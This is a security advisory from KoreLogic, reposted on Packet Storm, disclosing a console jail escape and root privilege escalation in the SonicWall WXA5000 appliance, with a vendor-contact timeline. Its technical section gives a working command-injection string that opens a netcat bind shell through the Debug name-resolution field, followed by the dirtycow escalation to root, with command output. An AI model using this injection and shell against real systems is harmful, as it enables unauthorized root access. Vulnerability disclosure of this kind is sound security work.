Exploit the possiblities

Sonicwall WXA5000 1.3.2-10-30 Console Jail Escape / Privilege Escalation

Sonicwall WXA5000 1.3.2-10-30 Console Jail Escape / Privilege Escalation
Posted Oct 25, 2017
Authored by Matthew Bergin | Site korelogic.com

Sonicwall WXA5000 version 1.3.2-10-30 suffers from console jail escape and privilege escalation vulnerabilities.

tags | exploit, vulnerability
MD5 | 96ae20044a39b528b9cd3c1fe1e9bab9

Sonicwall WXA5000 1.3.2-10-30 Console Jail Escape / Privilege Escalation

Change Mirror Download
KL-001-2017-019 : Sonicwall WXA5000 Console Jail Escape and Privilege Escalation

Title: Sonicwall WXA5000 Console Jail Escape and Privilege Escalation
Advisory ID: KL-001-2017-019
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-019.txt


1. Vulnerability Details

Affected Vendor: Sonicwall
Affected Product: WXA5000 WAN Optimization Appliance
Affected Version: 1.3.2-10-30
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements
used in an OS Command
Impact: Root Access
Attack vector: Console

2. Vulnerability Description

The console menu for this appliance can be escaped
into a regular sh shell by using encapsulated $() shell
commands. Privileges can be escalated to root by using the
dirtyc0w exploit.

3. Technical Description

????????????????SonicWALL WAN Optimization Configuration?????????????????
? Show Network Settings ?
? Renew DHCP lease ?
? Show Serial Number ?
? Show Firmware Version ?
? Factory Reset - Restore the device to factory installed state. ?
? Secure Factory Reset - Securely erase hard disk and do Factory Reset. ?
? Upgrade Firmware - Upgrade Firmware via USB stick. ?
? ------------------ ?
? Debug ?
? Help ?
? ------------------ ?
? Reboot ?
? Shutdown ?
?????????????????????????????????????????????????????????????????????????

Selecting 'Debug' provides a basic diagnostic menu allowing
the user to ping the gateway, show system load, or resolve a
domain name.

Use the following string during name resolution:

$(nc -l -p 4444 -e /bin/sh 1>&2)

Next, connect to the shell using netcat.

$ nc -v 1.3.3.7 4444
Connection to 1.3.3.7 4444 port [tcp/krb524] succeeded!
id;uname -a
uid=1017(wxauser) gid=1017 groups=1017
Linux WXA5000-9A067AC 3.10.15 #1 SMP Thu Jan 12 07:31:33 PST 2017 x86_64 GNU/Linux

This kernel version is vulnerable to the dirtycow exploit.

/tmp/cowroot
uname -a;id
Linux WXA5000-9A067AC 3.10.15 #1 SMP Thu Jan 12 07:31:33 PST 2017 x86_64 GNU/Linux
uid=0(root) gid=1017 groups=0(root),1017

4. Mitigation and Remediation Recommendation

There is no known remediation for this vulnerability from the vendor. Administrators should heavily restrict access
to any account of any privilege which can use the Debug functionality of the CLI.

Network access to management interfaces should be properly segmented.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.07.21 - KoreLogic requests security contact and PGP key from
Sonicwall using the vulnerability submission form at
https://mysonicwall.com/report/ProdVul.aspx.
2017.07.24 - KoreLogic requests security contact and PGP key from
Sonicwall using security@sonicwall.com email address.
2017.08.09 - KoreLogic submits vulnerability information to Sonicwall
using https://mysonicwall.com/report/ProdVul.aspx.
Vulnerability submission ID 10762.
2017.08.16 - 5 business days have elapsed since the vulnerability
was reported. No response from Sonicwall.
2017.09.21 - 30 business days have elapsed since the vulnerability
was reported.
2017.10.13 - 45 business days have elapsed since the vulnerability
was reported to Sonicwall.
2017.10.19 - KoreLogic requests update from security@sonicwall.com.
2017.10.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    10 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close